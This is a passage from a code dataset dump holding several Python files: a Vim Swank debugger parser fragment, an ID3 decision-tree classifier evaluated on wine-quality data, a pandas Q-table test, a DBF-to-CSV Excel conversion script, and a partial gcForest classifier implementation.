if type(struct) == list and len(struct) == 4:\n if struct[1] == 'nil':\n [lnum, cnum] = [int(struct[2][1]), 1]\n fname = 'Unknown file'\n else:\n [lnum, cnum] = parse_filepos(unquote(struct[1][1]), int(struct[2][1]))\n fname = format_filename(struct[1][1])\n if lnum > 0:\n s = ' in ' + fname + ' line ' + str(lnum)\n else:\n s = ' in ' + fname + ' byte ' + struct[2][1]\n slines = s.splitlines()\n if len(slines) > 2:\n # Make a fold (closed) if there are too many lines\n slines[ 0] = slines[ 0] + '{{{'\n slines[-1] = slines[-1] + '}}}'\n buf[line:line] = slines\n vim.command(str(line+1) + 'foldclose')\n else:\n buf[line:line] = slines\n else:\n buf[line:line] = [' No source line information']\n vim.command('call slimv#endUpdate()')\n\ndef swank_parse_locals(swank, struct, action):\n \"\"\"\n Parse frame locals output\n \"\"\"\n frame_num = action.data\n vim.command('call slimv#gotoFrame(' + frame_num + ')')\n vim.command('setlocal modifiable')\n buf = vim.current.buffer\n win = vim.current.window\n line = win.cursor[0]\n if type(struct) == list:\n lines = ' Locals:'\n num = 0\n for f in struct:\n name = parse_plist(f, ':name')\n id = parse_plist(f, ':id')\n value = parse_plist(f, ':value')\n lines = lines + '\\n ' + name + ' = ' + value\n # Remember variable index in frame\n swank.frame_locals[str(frame_num) + \" \" + name] = num\n num = num + 1\n else:\n lines = ' No locals'\n buf[line:line] = lines.split(\"\\n\")\n vim.command('call slimv#endUpdate()')\n\ndef parse_plist(lst, keyword):\n for i in range(0, len(lst), 2):\n if keyword == lst[i]:\n return unquote(lst[i+1])\n return ''\n\n","sub_path":"python2/swank/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":9015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"566792777","text":"import csv\nimport sys\nimport time\nimport numpy as np\n#import matplotlib.pyplot as plt \n\nimport pickle\n\n\n#start = time.time()\n# Timing Start\n\n# Function to check, if node is unique to make classification\ndef unique_data_labels(data):\n count=len(np.unique(data[:,-1]))\n if(count==1):\n return 1\n else:\n return 0\n# Function to Make classifciation, based on majority classification model\ndef classify_data_labels(data):\n array,counts=np.unique(data[:,-1],return_counts=True)\n tmp=np.argmax(counts)\n predicted_label=array[tmp]\n \n return predicted_label\n# Function to calucate overall system entropy\ndef data_entropy(data):\n array,counts=np.unique(data[:,-1],return_counts=True)\n Pr_array=counts/float(np.sum(counts))\n entropy=-np.sum(Pr_array*(np.log2(Pr_array)))\n\n return entropy\n# Function to compute expected entropy\ndef expected_entropy(data_left,data_right):\n p_left=float(len(data_left))/(len(data_left)+len(data_right))\n p_right=float(len(data_right))/(len(data_left)+len(data_right))\n exp_entropy=(p_left*data_entropy(data_left) + p_right*data_entropy(data_right))\n \n return exp_entropy\n# Function for information gain\ndef information_gain(data,data_left,data_right):\n e1=data_entropy(data)\n e2=expected_entropy(data_left,data_right)\n IG=e1-e2\n \n return IG\n# Function for splitting data to create binary tree\ndef create_data_split(data,split_col,split_val):\n split_col_values=data[:,split_col]\n data_left=data[split_col_values<=split_val]\n data_right=data[split_col_values>split_val]\n \n return data_left,data_right\n# Function to estimate best split decision, based on Information gain ID3 algorithm\ndef find_best_decision(data): \n split_choices={}\n \n for i in range(0,np.shape(data)[1]-1):\n split_choices[i]=[]\n unique_values=np.unique(data[:,i])\n for j in range(0,len(unique_values)):\n if(j!=0):\n val1=unique_values[j]\n val2=unique_values[j-1]\n split_val=(val1+val2)/2\n split_choices[i].append(split_val)\n\n IG=0\n \n for i in range(0,len(split_choices)):\n for j in split_choices[i]:\n data_left,data_right=create_data_split(data,i,j)\n IG_new=information_gain(data,data_left,data_right) \n if(IG_new>=IG):\n IG=IG_new\n best_split_col=i\n best_split_val=j\n \n return best_split_col,best_split_val\n# Confusion Matrix to calculate F1 score and accuracy results \ndef CM(Y_pred,Y_true):\n Con_Mat=np.zeros((11,11))\n TP=np.zeros(11)\n FP=np.zeros(11)\n FN=np.zeros(11)\n F=np.zeros(11)\n \n for i in range(0,len(Y_pred)):\n Con_Mat[int(Y_true[i])][int(Y_pred[i])]=Con_Mat[int(Y_true[i])][int(Y_pred[i])]+1\n \n for i in range(0,11):\n for j in range(0,11):\n if(i==j):\n TP[i]=Con_Mat[i][j]\n else:\n FN[i]=FN[i]+Con_Mat[i][j]\n FP[i]=FP[i]+Con_Mat[j][i]\n if(TP[i]==0):\n F[i]=0\n else:\n F[i]=2*TP[i]/float(2*TP[i]+FP[i]+FN[i])\n \n F1_Score=float(np.sum(F))/(len(np.unique(Y_true))) \n Accuracy=float(np.sum(TP))/(len(Y_pred))\n \n return Accuracy,F1_Score\n# Function to generate tree , used in training and testing \n# The hyper parameters, Max depth and min instance count\ndef create_decision_treeID3(data,min_instance_count=2,Max_Depth=11,depth_count=0):\n \n if((unique_data_labels(data))or(len(data)<min_instance_count)or(depth_count==Max_Depth)):\n predicted_label=classify_data_labels(data)\n return predicted_label\n \n else:\n depth_count=depth_count+1 \n bsplit_col,bsplit_val=find_best_decision(data)\n data_left,data_right=create_data_split(data,bsplit_col,bsplit_val)\n decision=\"{} <= {}\".format(bsplit_col,bsplit_val)\n sub_tree={decision:[]}\n \n left=create_decision_treeID3(data_left,min_instance_count,Max_Depth,depth_count)\n right=create_decision_treeID3(data_right,min_instance_count,Max_Depth,depth_count)\n \n if(left==right):\n sub_tree=left\n else:\n sub_tree[decision].append(left)\n sub_tree[decision].append(right)\n \n return sub_tree\n# Function for Making decision to classify example for an instance \ndef make_decision(x,tree):\n decision = list(tree.keys())[0]\n col_index, comparison_operator, value = decision.split(\" \")\n\n if(x[int(col_index)]<=float(value)):\n label=tree[decision][0]\n else:\n label=tree[decision][1]\n \n if not isinstance(label, dict):\n return label\n else:\n return make_decision(x,label)\n# Function to print final output after cross validation, similar to KNN, using Decision trees\ndef Final_Output_Test(X_train,X_test,K):\n X_val=X_train[0:np.shape(X_train)[0]/5]\n X_train=X_train[np.shape(X_train)[0]/5:np.shape(X_train)[0]]\n \n Y_train=X_train[:,11]\n Y_val=X_val[:,11]\n Y_test=X_test[:,11]\n \n Mean=X_train[:,0:11].mean(0)\n Std=X_train[:,0:11].std(0) \n X_train[:,0:11]=(X_train[:,0:11]-Mean)/Std\n X_val[:,0:11]=(X_val[:,0:11]-Mean)/Std\n X_test[:,0:11]=(X_test[:,0:11]-Mean)/Std\n \n for k in range(K,K+1):\n tree = create_decision_treeID3(X_train,min_instance_count=2,Max_Depth=k,depth_count=0)\n \n Y_pred=np.zeros(len(X_train))\n for i in range(0,len(X_train)):\n Y_pred[i]=make_decision(X_train[i],tree) \n \n TrAccuracy,TrF1_Score=CM(Y_pred,Y_train)\n \n Y_pred=np.zeros(len(X_val))\n for i in range(0,len(X_val)):\n Y_pred[i]=make_decision(X_val[i],tree) \n \n VAccuracy,VF1_Score=CM(Y_pred,Y_val)\n\n Y_pred=np.zeros(len(X_test))\n for i in range(0,len(X_test)):\n Y_pred[i]=make_decision(X_test[i],tree) \n \n TsAccuracy,TsF1_Score=CM(Y_pred,Y_test)\n\n return TsAccuracy,TsF1_Score,VAccuracy,VF1_Score,TrAccuracy,TrF1_Score \n \n# Function for Cross Validation, only parameter is Kmax- Max depth of Tree\ndef cross_validation_test(X_train,K_Max):\n X_val=X_train[0:np.shape(X_train)[0]/5]\n X_train=X_train[np.shape(X_train)[0]/5:np.shape(X_train)[0]]\n \n Y_train=X_train[:,11]# Splitting data\n Y_val=X_val[:,11]\n \n Mean=X_train[:,0:11].mean(0)# Normalizing data\n Std=X_train[:,0:11].std(0)\n X_train[:,0:11]=(X_train[:,0:11]-Mean)/Std\n X_val[:,0:11]=(X_val[:,0:11]-Mean)/Std \n \n Accuracy=np.zeros(K_Max+1)\n F1_Score=np.zeros(K_Max+1)\n \n for k in range(2,K_Max+1): # Cross Validation\n Y_pred=np.zeros(len(X_val)) # Generating tree command below with varying depth\n tree = create_decision_treeID3(X_train,min_instance_count=2,Max_Depth=k,depth_count=0)\n for i in range(0,len(X_val)):\n Y_pred[i]=make_decision(X_val[i],tree)\n \n Accuracy[k],F1_Score[k]=CM(Y_pred,Y_val) # Computin F1 score and accuracy\n \n print(\"The value of Max-Depth is %d .\" %(k))\n print(F1_Score[k])\n\n return Accuracy,F1_Score\n\n\nfile = open('winequality-white.csv')\n\ndata=[]\nTsAc=[]\nTsF1=[]\nVAc=[]\nVF1=[]\nTrAc=[]\nTrF1=[]\n\nfor row in file:\n a=row.split(';')\n data.append(a)\n\ndel data[0]\n\nX=np.asarray(data).astype('float')\n#np.random.seed(5)\nnp.random.shuffle(X)\n\nX_1=X[0:np.shape(X)[0]/4]\nX_2=X[np.shape(X)[0]/4:2*(np.shape(X)[0]/4)]\nX_3=X[2*(np.shape(X)[0]/4):3*(np.shape(X)[0]/4)]\nX_4=X[3*(np.shape(X)[0]/4):np.shape(X)[0]]\n\ntest=[X_1,X_2,X_3,X_4]\ntr1=np.concatenate((X_2,X_3,X_4),axis=0)\ntr2=np.concatenate((X_3,X_4,X_1),axis=0)\ntr3=np.concatenate((X_4,X_1,X_2),axis=0)\ntr4=np.concatenate((X_1,X_2,X_3),axis=0)\ntrain=[tr1,tr2,tr3,tr4] # Data split into folds for cross validation and testing\n\nK_best_final=14 # Best Max-Depth\n\nprint(\"Hyper-parameters:\")\nprint(\"Best Max-Depth in Fold: %d\" %(K_best_final))\n\nfor i in range(0,4):\n X_test=test[i]\n X_train=train[i]\n \n TsAccuracy,TsF1_Score,VAccuracy,VF1_Score,TrAccuracy,TrF1_Score=Final_Output_Test(X_train,X_test,K_best_final)\n TsAc.append(TsAccuracy)\n TsF1.append(TsF1_Score)\n VAc.append(VAccuracy)\n VF1.append(VF1_Score)\n TrAc.append(TrAccuracy)\n TrF1.append(TrF1_Score)\n\n print(\"Fold-%d:\" %(i+1))\n print(\"Training: F1 Score: %f , Accuracy: %f\" %(TrF1_Score,TrAccuracy))\n print(\"Validation: F1 Score: %f , Accuracy: %f\" %(VF1_Score,VAccuracy))\n print(\"Test: F1 Score: %f , Accuracy: %f\" %(TsF1_Score,TsAccuracy))\n \n\nprint(\"Average:\")\nprint(\"Training: F1 Score: %f , Accuracy: %f\" %(np.mean(TrF1),np.mean(TrAc)))\nprint(\"Validation: F1 Score: %f , Accuracy: %f\" %(np.mean(VF1),np.mean(VAc)))\nprint(\"Test: F1 Score: %f , Accuracy: %f\" %(np.mean(TsF1),np.mean(TsAc)))\n\n# Timing Metrics\n#end = time.time()\n#print(\"The time taken for the algorithm computation is :- %f seconds.\" % (end-start))\n\n#file = open('winequality-white.csv')\n#\n#data=[]\n#Ac=[]\n#F1=[]\n#\n#TsAc=[]\n#TsF1=[]\n#VAc=[]\n#VF1=[]\n#TrAc=[]\n#TrF1=[]\n#\n#for row in file:\n# a=row.split(';')\n# data.append(a)\n#\n#del data[0]\n#\n#X=np.asarray(data).astype('float')\n##np.random.seed(0)\n#np.random.shuffle(X)\n#\n#X_1=X[0:np.shape(X)[0]/4]\n#X_2=X[np.shape(X)[0]/4:2*(np.shape(X)[0]/4)]\n#X_3=X[2*(np.shape(X)[0]/4):3*(np.shape(X)[0]/4)]\n#X_4=X[3*(np.shape(X)[0]/4):np.shape(X)[0]]\n#\n#test=[X_1,X_2,X_3,X_4]\n#tr1=np.concatenate((X_2,X_3,X_4),axis=0)\n#tr2=np.concatenate((X_3,X_4,X_1),axis=0)\n#tr3=np.concatenate((X_4,X_1,X_2),axis=0)\n#tr4=np.concatenate((X_1,X_2,X_3),axis=0)\n#train=[tr1,tr2,tr3,tr4]\n#\n#for i in range(0,4):\n# X_test=test[i]\n# X_train=train[i]\n# \n# Accuracy,F1_Score=cross_validation_test(X_train,25)\n# K_best_fold=np.argmax(F1_Score)\n# print(\"The best value of Max-Depth is %d and fold number is %d.\" % (K_best_fold,i+1))\n# print(Accuracy[K_best_fold])\n# print(F1_Score[K_best_fold])\n#\n# x = np.arange(2,26, 1)\n# Accuracy=Accuracy[2:]\n# F1_Score=F1_Score[2:]\n# F1.append(F1_Score)\n# Ac.append(Accuracy)\n# \n# plt.figure(1)\n# plt.plot(x,Accuracy, label = \"fold %d\" %(i+1))\n# plt.figure(2)\n# plt.plot(x,F1_Score, label = \"fold %d\" %(i+1))\n# \n# TsAccuracy,TsF1_Score,VAccuracy,VF1_Score,TrAccuracy,TrF1_Score=Final_Output_Test(X_train,X_test,K_best_fold)\n# TsAc.append(TsAccuracy)\n# TsF1.append(TsF1_Score)\n# VAc.append(VAccuracy)\n# VF1.append(VF1_Score)\n# TrAc.append(TrAccuracy)\n# TrF1.append(TrF1_Score)\n#\n# print(\"Hyper-parameters:\")\n# print(\"Best Max-Depth in Fold: %d\" %(K_best_fold))\n#\n# print(\"Fold-%d:\" %(i+1))\n# print(\"Training: F1 Score: %f , Accuracy: %f\" %(TrF1_Score,TrAccuracy))\n# print(\"Validation: F1 Score: %f , Accuracy: %f\" %(VF1_Score,VAccuracy))\n# print(\"Test: F1 Score: %f , Accuracy: %f\" %(TsF1_Score,TsAccuracy))\n# \n# \n#print(\"Average:\")\n#print(\"Training: F1 Score: %f , Accuracy: %f\" %(np.mean(TrF1),np.mean(TrAc)))\n#print(\"Validation: F1 Score: %f , Accuracy: %f\" %(np.mean(VF1),np.mean(VAc)))\n#print(\"Test: F1 Score: %f , Accuracy: %f\" %(np.mean(TsF1),np.mean(TsAc)))\n# \n#\n#plt.figure(1)\n#plt.xlabel('K') \n## naming the y axis \n#plt.ylabel('Accuracy') \n## giving a title to my graph \n#plt.title('Accuracy vs K') \n## show a legend on the plot \n#plt.legend() \n## function to show the plot \n#plt.savefig('Accuracy.png')\n#\n#plt.figure(2)\n#plt.xlabel('K') \n## naming the y axis \n#plt.ylabel('F1 Score') \n## giving a title to my graph \n#plt.title('F1 Scores vs K') \n## show a legend on the plot \n#plt.legend() \n## function to show the plot \n#plt.savefig('F1_Score.png')\n#\n#pickle.dump(X, open( \"X_data_saved.p\", \"wb\" ) ) \n#pickle.dump(Ac, open( \"Ac_data_saved.p\", \"wb\" ) )\n#pickle.dump(F1, open( \"F1_data_saved.p\", \"wb\" ) )\n#\n#\n#end = time.time()\n#print(\"The time taken for the algorithm computation is :- %f seconds.\" % (end-start))\n","sub_path":"decisiontree.py.py","file_name":"decisiontree.py.py","file_ext":"py","file_size_in_byte":11889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"69668756","text":"import pandas as pd\r\nimport numpy as np\r\n\r\nactions = ['1','2','3','4']\r\n\r\nindexs = ['手牌', '牌堆']\r\n\r\ncolu = indexs + actions\r\n# indexes = pd.MultiIndex.from_product([['期中'],['语']])\r\n\r\n# columns = ['tom','jack','rose']\r\n# data = np.random.randint(0,150,size=(1,4))\r\n# q_table = pd.DataFrame(data=data,index=indexes,columns=actions)\r\n\r\nq_table = pd.DataFrame(columns=colu, dtype=np.float64)\r\n\r\nq_table = q_table.append(pd.Series(['1', '1', 0, 0, 0, 0], index=colu, name='1,2'))\r\n\r\nprint(q_table)\r\nprint(q_table.loc['1,2',:])\r\n#data = pd.Series(np.random.randn(10), index=[['x', 'x', 'x', 'x', 'x', 'x', 'y', 'y', 'y', 'y'], ['a', 'a', 'a', 'b', 'b', 'b', 'c', 'c', 'd', 'd'], [1, 2, 3, 1, 2, 3, 1, 2, 2, 3]])\r\n","sub_path":"majiang/pandas_test.py","file_name":"pandas_test.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"471866069","text":"import win32com.client\r\nexcel = win32com.client.Dispatch('Excel.Application')\r\n\r\ninDBF = r\"C:/_DATA/CancerData/test/Jan15/satscan/highlow/0.dbf\"\r\noutCSV = r\"C:/_DATA/CancerData/test/Jan15/satscan/highlow/0.csv\"\r\n\r\nworkbook = excel.Workbooks.Open(inDBF)\r\n# 24 represents xlCSVMSDOS\r\nworkbook.SaveAs(outCSV,FileFormat=24)\r\n\r\nexcel.Quit()","sub_path":"txtEditor/dbfTOcsv.py","file_name":"dbfTOcsv.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"509371843","text":"#!usr/bin/env python\nimport copy\nimport itertools\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import *\n\nfrom .estimators import classified_estimators\nfrom .kfold_wrapper import kfold_wrapper\n\nclass GCForestClassifier(classified_estimators):\n\n def __init__(self, shape_1X=None, n_mgsRFtree=30, window=None, stride=1,\n cascade_test_size=0.2, n_cascadeRF=2, n_cascadeRFtree=101, cascade_layer=np.inf,\n min_samples_mgs=0.1, min_samples_cascade=0.05, tolerance=0.0, \n cv_method='group', n_mgs_cv=10, n_cascade_cv=10, cv_mgs_valSize=0.2, cv_cascade_valSize=0.2, \n n_jobs=-1, scoring=None):\n \"\"\" GCForest Classifier.\n\n :param shape_1X: int or tuple list or np.array (default=None)\n Shape of a single sample element [n_lines, n_cols]. Required when calling mg_scanning!\n For sequence data a single int can be given.\n\n :param n_mgsRFtree: int (default=30)\n Number of trees in a Random Forest during Multi Grain Scanning.\n\n :param window: int (default=None)\n List of window sizes to use during Multi Grain Scanning.\n If 'None' no slicing will be done.\n\n :param stride: int (default=1)\n Step used when slicing the data.\n\n :param cascade_test_size: float or int (default=0.2)\n Split fraction or absolute number for cascade training set splitting.\n\n :param n_cascadeRF: int (default=2)\n Number of estimators in a cascade layer. \n Only useful when estimators can use out-of-bag samples.\n For each pseudo Random Forest a complete Random Forest is created, hence\n the total numbe of Random Forests in a layer will be 2*n_cascadeRF.\n\n :param n_cascadeRFtree: int (default=101)\n Number of trees in a single Random Forest in a cascade layer.\n \n :param cascade_layer: int (default=np.inf)\n mMximum number of cascade layers allowed.\n Useful to limit the contruction of the cascade.\n \n :param min_samples_mgs: float or int (default=0.1)\n Minimum number of samples in a node to perform a split\n during the training of Multi-Grain Scanning Random Forest.\n If int number_of_samples = int.\n If float, min_samples represents the fraction of the initial n_samples to consider.\n\n :param min_samples_cascade: float or int (default=0.05)\n Minimum number of samples in a node to perform a split\n during the training of Cascade Random Forest.\n If int number_of_samples = int.\n If float, min_samples represents the fraction of the initial n_samples to consider.\n \n :param tolerance: float (default=0.0)\n Accuracy tolerance for the casacade growth.\n If the improvement in accuracy is not better than the tolerance the construction is\n stopped.\n \n :param cv_method: str (default='group')\n The method of cross-validation\n If 'group', CV will use LeaveOneGroupOut in sklearn.model_selection.\n If 'sequence', CV will be processed as time series.\n Orther methods will be added in new version.\n \n :param n_mgs_cv: int (default=10)\n Number of folds of CV in a estimator during Multi Grain Scanning.\n Only useful when the estimator can use out-of-bag samples.\n \n :param n_cascade_cv: int (default=10)\n Number of folds of CV in a estimator in a cascade layer.\n Only useful when the estimator can use out-of-bag samples.\n \n :param cv_mgs_valSize: float (default=0.2)\n During Multi Grain Scanning, the ratio of valication in member of serial n_folds.\n And the length of valicaiton is rounded off.\n \n :param cv_cascade_valSize: float (default=0.2)\n In a cascade layer, the ratio of valication in member of serial n_folds.\n And the length of valicaiton is rounded off.\n \n :param n_jobs: int (default=-1)\n The number of jobs to run in parallel for any Random Forest fit and predict.\n If -1, then the number of jobs is set to the number of cores.\n \n :param scoring: str (default=None)\n The method of score evaluation, \n Here use classification metrics.\n Best value at 1 and worst score at 0 for All scores.\n In addition, you can input a score function that can be recognized by sklearn.\n \"\"\"\n \n setattr(self, 'shape_1X', shape_1X)\n setattr(self, 'n_layer', 0)\n setattr(self, '_n_samples', 0)\n setattr(self, 'n_cascadeRF', int(n_cascadeRF))\n if isinstance(window, int):\n setattr(self, 'window', [window])\n elif isinstance(window, list):\n setattr(self, 'window', window)\n elif window is None:\n setattr(self, 'window', window)\n else:\n raise ValueError('Param window cannot get ', window)\n setattr(self, 'stride', stride)\n setattr(self, 'cascade_test_size', cascade_test_size)\n setattr(self, 'n_mgsRFtree', int(n_mgsRFtree))\n setattr(self, 'n_cascadeRFtree', int(n_cascadeRFtree))\n setattr(self, 'cascade_layer', cascade_layer)\n setattr(self, 'min_samples_mgs', min_samples_mgs)\n setattr(self, 'min_samples_cascade', min_samples_cascade)\n setattr(self, 'tolerance', tolerance)\n setattr(self, 'n_jobs', n_jobs)\n \n super(GCForestClassifier, self).__init__(n_mgsRFtree=self.n_mgsRFtree, \n n_cascadeRFtree=self.n_cascadeRFtree, min_samples_mgs=self.min_samples_mgs, \n min_samples_cascade=self.min_samples_cascade, n_jobs=self.n_jobs)\n \n setattr(self, 'kfold_wrapper', kfold_wrapper)\n setattr(self, 'cv_method', cv_method)\n setattr(self, 'n_mgs_cv', int(n_mgs_cv))\n setattr(self, 'n_cascade_cv', int(n_cascade_cv))\n setattr(self, 'cv_mgs_valSize', cv_mgs_valSize)\n setattr(self, 'cv_cascade_valSize', cv_cascade_valSize)\n \n if scoring is None or scoring == 'accuracy':\n setattr(self, 'scoring', accuracy_score)\n elif scoring == 'balanced_accuracy':\n setattr(self, 'scoring', balanced_accuracy_score)\n elif scoring == 'average_precision':\n setattr(self, 'scoring', average_precision_score)\n elif scoring == 'brier_score_loss':\n setattr(self, 'scoring', brier_score_loss)\n elif scoring == 'f1':\n setattr(self, 'scoring', f1_score)\n elif scoring == 'precision':\n setattr(self, 'scoring', precision_score)\n elif scoring == 'recall':\n setattr(self, 'scoring', recall_score)\n elif scoring == 'roc_auc':\n setattr(self, 'scoring', roc_auc_score)\n else:\n setattr(self, 'scoring', scoring)\n \n\n def fit(self, X, y):\n \"\"\" Training the gcForest on input data X and associated target y.\n\n :param X: np.array\n Array containing the input samples.\n Must be of shape [n_samples, data] where data is a 1D array.\n\n :param y: np.array\n 1D array containing the target values.\n Must be of shape [n_samples]\n \"\"\"\n if np.shape(X)[0] != len(y):\n raise ValueError('Sizes of y and X do not match.')\n\n mgs_X = self.mg_scanning(X, y)\n _ = self.cascade_forest(mgs_X, y)\n\n def predict_proba(self, X):\n \"\"\" Predict the class probabilities of unknown samples X.\n\n :param X: np.array\n Array containing the input samples.\n Must be of the same shape [n_samples, data] as the training inputs.\n\n :return: np.array\n 1D array containing the predicted class probabilities for each input sample.\n \"\"\"\n mgs_X = self.mg_scanning(X)\n cascade_all_pred_prob = self.cascade_forest(mgs_X)\n predict_proba = np.mean(cascade_all_pred_prob, axis=0)\n\n return predict_proba\n\n def predict(self, X):\n \"\"\" Predict the class of unknown samples X.\n\n :param X: np.array\n Array containing the input samples.\n Must be of the same shape [n_samples, data] as the training inputs.\n\n :return: np.array\n 1D array containing the predicted class for each input sample.\n \"\"\"\n pred_proba = self.predict_proba(X=X)\n predictions = np.argmax(pred_proba, axis=1)\n\n return predictions\n\n def mg_scanning(self, X, y=None):\n \"\"\" Performs a Multi Grain Scanning on input data.\n\n :param X: np.array\n Array containing the input samples.\n Must be of shape [n_samples, data] where data is a 1D array.\n\n :param y: np.array (default=None)\n\n :return: np.array\n Array of shape [n_samples, .. ] containing Multi Grain Scanning sliced data.\n \"\"\"\n setattr(self, '_n_samples', np.shape(X)[0])\n shape_1X = getattr(self, 'shape_1X')\n if isinstance(shape_1X, int):\n shape_1X = [1,shape_1X]\n if not getattr(self, 'window'):\n setattr(self, 'window', [shape_1X[1]])\n\n mgs_pred_prob = []\n\n for wdw_size in getattr(self, 'window'):\n wdw_pred_prob = self.window_slicing_pred_prob(X, wdw_size, shape_1X, y=y)\n mgs_pred_prob.append(wdw_pred_prob)\n\n return np.concatenate(mgs_pred_prob, axis=1)\n\n def window_slicing_pred_prob(self, X, window, shape_1X, y=None):\n \"\"\" Performs a window slicing of the input data and send them through Estimators.\n If target values 'y' are provided sliced data are then used to train the Estimators.\n\n :param X: np.array\n Array containing the input samples.\n Must be of shape [n_samples, data] where data is a 1D array.\n\n :param window: int\n Size of the window to use for slicing.\n\n :param shape_1X: list or np.array\n Shape of a single sample.\n\n :param y: np.array (default=None)\n Target values. If 'None' no training is done.\n\n :return: np.array\n Array of size [n_samples, ..] containing the Random Forest.\n prediction probability for each input sample.\n \"\"\"\n stride = getattr(self, 'stride')\n\n if shape_1X[0] > 1:\n print('Slicing Images...')\n sliced_X, sliced_y = self._window_slicing_img(X, window, shape_1X, y=y, stride=stride)\n else:\n print('Slicing Sequence...')\n sliced_X, sliced_y = self._window_slicing_sequence(X, window, shape_1X, y=y, stride=stride)\n \n mgs_list, mgs_estimators, mgs_OOB = self.get_mgs_estimators()\n for i, mgs in enumerate(mgs_list):\n if y is not None:\n #the estimator must has sklearn API,and can work with function predict, predict_proba\n estimator = mgs_estimators[mgs]\n print('Training MGS Model: ', mgs)\n \n if mgs_OOB[mgs]:\n estimator.fit(sliced_X, sliced_y)\n setattr(self, '_mgs%s_%d'%(mgs, window), copy.deepcopy(estimator))\n pred_prob_est = estimator.oob_decision_function_\n elif not mgs_OOB[mgs]:\n estimator_cv = self.kfold_wrapper(estimator, est_fun='class', n_folds=self.n_mgs_cv, \n fold_method=self.cv_method, val_size=self.cv_mgs_valSize) \n estimator_cv.fit(sliced_X, sliced_y)\n setattr(self, '_mgs%s_%d'%(mgs, window), copy.deepcopy(estimator_cv.estimator))\n pred_prob_est = estimator_cv.cv_pred_prob\n \n if hasattr(self, '_mgs%s_%d'%(mgs, window)) and y is None:\n estimator = getattr(self, '_mgs%s_%d'%(mgs, window))\n pred_prob_est = estimator.predict_proba(sliced_X)\n \n if i==0:\n pred_prob = pred_prob_est\n elif i>0:\n pred_prob = np.c_[pred_prob, pred_prob_est]\n \n return pred_prob.reshape([getattr(self, '_n_samples'), -1])\n\n def _window_slicing_img(self, X, window, shape_1X, y=None, stride=1):\n \"\"\" Slicing procedure for images\n\n :param X: np.array\n Array containing the input samples.\n Must be of shape [n_samples, data] where data is a 1D array.\n\n :param window: int\n Size of the window to use for slicing.\n\n :param shape_1X: list or np.array\n Shape of a single sample [n_lines, n_cols].\n\n :param y: np.array (default=None)\n Target values.\n\n :param stride: int (default=1)\n Step used when slicing the data.\n\n :return: np.array and np.array\n Arrays containing the sliced images and target values (empty if 'y' is None).\n \"\"\"\n if any(s < window for s in shape_1X):\n raise ValueError('window must be smaller than both dimensions for an image')\n\n len_iter_x = np.floor_divide((shape_1X[1] - window), stride) + 1\n len_iter_y = np.floor_divide((shape_1X[0] - window), stride) + 1\n iterx_array = np.arange(0, stride*len_iter_x, stride)\n itery_array = np.arange(0, stride*len_iter_y, stride)\n\n ref_row = np.arange(0, window)\n ref_ind = np.ravel([ref_row + shape_1X[1] * i for i in range(window)])\n inds_to_take = [ref_ind + ix + shape_1X[1] * iy\n for ix, iy in itertools.product(iterx_array, itery_array)]\n\n sliced_imgs = np.take(X, inds_to_take, axis=1).reshape(-1, window**2)\n\n if y is not None:\n sliced_target = np.repeat(y, len_iter_x * len_iter_y)\n elif y is None:\n sliced_target = None\n\n return sliced_imgs, sliced_target\n\n def _window_slicing_sequence(self, X, window, shape_1X, y=None, stride=1):\n \"\"\" Slicing procedure for sequences (aka shape_1X = [.., 1]).\n\n :param X: np.array\n Array containing the input samples.\n Must be of shape [n_samples, data] where data is a 1D array.\n\n :param window: int\n Size of the window to use for slicing.\n\n :param shape_1X: list or np.array\n Shape of a single sample [n_lines, n_col].\n\n :param y: np.array (default=None)\n Target values.\n\n :param stride: int (default=1)\n Step used when slicing the data.\n\n :return: np.array and np.array\n Arrays containing the sliced sequences and target values (empty if 'y' is None).\n \"\"\"\n if shape_1X[1] < window:\n raise ValueError('window must be smaller than the sequence dimension')\n\n len_iter = np.floor_divide((shape_1X[1] - window), stride) + 1\n iter_array = np.arange(0, stride*len_iter, stride)\n\n ind_1X = np.arange(np.prod(shape_1X))\n inds_to_take = [ind_1X[i:i+window] for i in iter_array]\n sliced_sqce = np.take(X, inds_to_take, axis=1).reshape(-1, window)\n\n if y is not None:\n sliced_target = np.repeat(y, len_iter)\n elif y is None:\n sliced_target = None\n\n return sliced_sqce, sliced_target\n\n def cascade_forest(self, X, y=None):\n \"\"\" Perform (or train if 'y' is not None) a cascade forest estimator or other customer estimators.\n\n :param X: np.array\n Array containing the input samples.\n Must be of shape [n_samples, data] where data is a 1D array.\n\n :param y: np.array (default=None)\n Target values. If 'None' perform training.\n\n :return: np.array\n 1D array containing the predicted class for each input sample.\n \"\"\"\n if y is not None:\n setattr(self, 'n_layer', 0)\n test_size = getattr(self, 'cascade_test_size')\n max_layers = getattr(self, 'cascade_layer')\n tol = getattr(self, 'tolerance')\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size)\n\n self.n_layer += 1\n #print('n_layer: ', self.n_layer, ' ', 'X_train shape: ', X_train.shape)\n prf_crf_pred_ref = self._cascade_layer(X_train, y_train)\n #print('n_layer: ', self.n_layer, ' ', 'prf_crf_pred_ref length: ', len(prf_crf_pred_ref))\n accuracy_ref = self._cascade_evaluation(X_test, y_test)\n feat_arr = self._create_feat_arr(X_train, prf_crf_pred_ref)\n #print('n_layer: ', self.n_layer, ' ', 'feat_arr shape: ', feat_arr.shape)\n \n self.n_layer += 1\n prf_crf_pred_layer = self._cascade_layer(feat_arr, y_train)\n #print('n_layer: ', self.n_layer, ' ', 'prf_crf_pred_layer length: ', len(prf_crf_pred_layer))\n accuracy_layer = self._cascade_evaluation(X_test, y_test)\n\n while accuracy_layer > (accuracy_ref + tol) and self.n_layer <= max_layers:\n accuracy_ref = accuracy_layer\n prf_crf_pred_ref = prf_crf_pred_layer\n feat_arr = self._create_feat_arr(X_train, prf_crf_pred_ref)\n self.n_layer += 1\n prf_crf_pred_layer = self._cascade_layer(feat_arr, y_train)\n accuracy_layer = self._cascade_evaluation(X_test, y_test)\n\n if accuracy_layer < accuracy_ref :\n n_cascadeRF = getattr(self, 